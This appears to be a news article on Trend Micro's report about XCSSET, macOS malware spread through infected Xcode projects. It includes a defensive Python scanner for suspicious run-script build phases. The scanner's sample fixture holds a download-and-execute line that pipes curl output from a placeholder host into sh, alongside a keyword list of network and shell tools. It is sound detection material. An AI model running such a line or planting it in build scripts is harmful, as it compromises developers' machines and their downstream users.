According to Trend Micro, the threat poses a risk to Xcode developers because they share their projects via GitHub. As a result, the malware-infected code can lead to a “supply-chain” type attack against other users or organizations that rely on those code repositories.
“These Xcode projects have been modified such that upon building, these projects would run a malicious code. This eventually leads to the main XCSSET malware being dropped and run on the affected system,” Trend Micro explained in the blog post.
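A defender-side check that follows from the mechanism above, added here as an example and not code from Trend Micro or from the XCSSET report: an Xcode project's build-time behaviour lives in its project.pbxproj file, and one place a project can be made to run a command at build time is a run-script build phase (PBXShellScriptBuildPhase). The script below lists those phases and flags scripts containing download-and-execute patterns; the sample project fragment is constructed, and the assumption that a run-script phase is the vector is the example's own, not a claim about XCSSET's exact technique.

```python
import re

# Constructed project.pbxproj fragment (not from any real project).
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
    AB12CD34 /* ShellScript */ = {
        isa = PBXShellScriptBuildPhase;
        name = "Run Script";
        shellPath = /bin/sh;
        shellScript = "echo \"Build started\"\n";
    };
    EF56AB78 /* ShellScript */ = {
        isa = PBXShellScriptBuildPhase;
        shellPath = /bin/sh;
        shellScript = "curl -s http://example.invalid/p | base64 -d | sh\n";
    };
/* End PBXShellScriptBuildPhase section */
'''

# The old-style plist format used by pbxproj is not handled by plistlib,
# so the section and its entries are located with regular expressions.
SECTION_RE = re.compile(
    r"/\* Begin PBXShellScriptBuildPhase section \*/(.*?)"
    r"/\* End PBXShellScriptBuildPhase section \*/", re.S)
PHASE_RE = re.compile(r"([0-9A-F]{8,24}) /\* [^*]* \*/ = \{(.*?)\n\s*\};", re.S)
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')

# Indicators of a build phase that fetches and runs remote content.
SUSPICIOUS = ("curl ", "wget ", "base64", "| sh", "| bash", "osascript", "eval ")

def unescape(s):
    """Decode the backslash escapes pbxproj uses inside quoted strings."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)

def run_script_phases(pbxproj):
    """Return (phase_id, decoded_script) for every run-script build phase."""
    phases = []
    for section in SECTION_RE.findall(pbxproj):
        for ident, body in PHASE_RE.findall(section):
            m = SCRIPT_RE.search(body)
            if m:
                phases.append((ident, unescape(m.group(1))))
    return phases

def suspicious_phases(pbxproj):
    """Keep only phases whose script contains a download-and-execute indicator."""
    return [(i, s) for i, s in run_script_phases(pbxproj)
            if any(k in s for k in SUSPICIOUS)]

if __name__ == "__main__":
    for ident, script in suspicious_phases(SAMPLE_PBXPROJ):
        print(f"suspicious run-script phase {ident}: {script.strip()}")
```

Run it against `MyApp.xcodeproj/project.pbxproj` of a cloned project before the first build; any flagged phase deserves a manual read of the script.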
Trend Micro further describes the threat components, which consist of a trojan, “XCSSET”, and command-and-control (C2) related files.
In addition, XCSSET performs the following malicious behavior, according to the report:
- Exploits a vulnerability to read and dump Safari cookies to steal user data.
- Steals information from the user’s Evernote, Notes, Skype, Telegram, QQ, and WeChat apps.
- Takes screenshots of the victim’s current screen.
- Uploads files from the infected system to the attacker’s specified server.
- Encrypts files and shows a ransom note, if commanded by the server.
For instance, the malware can steal credentials (e.g., PayPal, Apple ID) and payment card data from the Apple Store, or modify cryptocurrency addresses, to name a few.
For more technical details, check out Trend Micro’s XCSSET technical brief.
Readers can also check out Trend Micro’s previous report on another Mac malware threat, “ThiefQuest”, which also targets macOS systems and is used to encrypt files and install keyloggers.